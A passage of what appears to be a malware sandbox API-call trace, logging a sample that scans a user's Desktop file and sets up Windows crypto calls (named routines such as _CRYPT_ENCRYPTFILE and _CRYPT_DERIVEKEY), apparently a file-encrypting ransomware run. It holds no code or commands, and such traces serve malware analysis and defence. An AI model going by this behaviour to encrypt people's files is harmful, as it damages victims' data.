lpString1="xz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FAlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AlaByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="laByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ByDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yDgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DgBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gBqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BqpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qpgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pgWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gWn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wn8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JbOac.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.771] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.771] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0158.771] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0158.771] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0158.771] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0158.771] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0158.771] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0158.771] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0158.772] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.772] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa00b9030, ftCreationTime.dwHighDateTime=0x1d5d7c1, ftLastAccessTime.dwLowDateTime=0xa6ca5750, ftLastAccessTime.dwHighDateTime=0x1d5df94, ftLastWriteTime.dwLowDateTime=0xa6ca5750, ftLastWriteTime.dwHighDateTime=0x1d5df94, nFileSizeHigh=0x0, nFileSizeLow=0x2520, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="FAlaByDgBqpgWn8JbOac.mp3", cAlternateFileName="FALABY~1.MP3")) returned 0x90af58 [0158.772] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0158.772] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.772] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0158.772] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.772] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.772] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0158.772] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.772] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0158.772] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.772] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.772] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0158.772] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.772] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.772] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.772] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.772] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.772] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0158.773] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.773] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0158.774] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.774] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.774] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0158.774] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0158.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0158.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0158.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0158.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0158.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0158.774] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0158.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0158.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0158.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0158.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0158.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0158.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0158.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0158.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0158.774] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0158.774] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0158.774] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0158.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.775] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0158.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0158.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0158.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5a0 [0158.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0158.775] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0158.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0158.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0158.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0158.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0158.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0158.775] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0158.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0158.775] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0158.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0158.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0158.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0158.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0158.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0158.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0158.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0158.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0158.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0158.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0158.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0158.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0158.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0158.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0158.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0158.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0158.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0158.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0158.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0158.776] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0158.776] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0158.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0158.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0158.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0158.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0158.776] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0158.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0158.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.776] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0158.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0158.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0158.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0158.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0158.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0158.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0158.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0158.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0158.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2618 [0158.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0158.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0158.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0158.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd750 [0158.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0158.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0158.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0158.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0158.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0158.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0158.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0158.778] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0158.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0158.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0158.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0158.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0158.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0158.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0158.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0158.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0158.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0158.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0158.779] RtlAllocateHeap 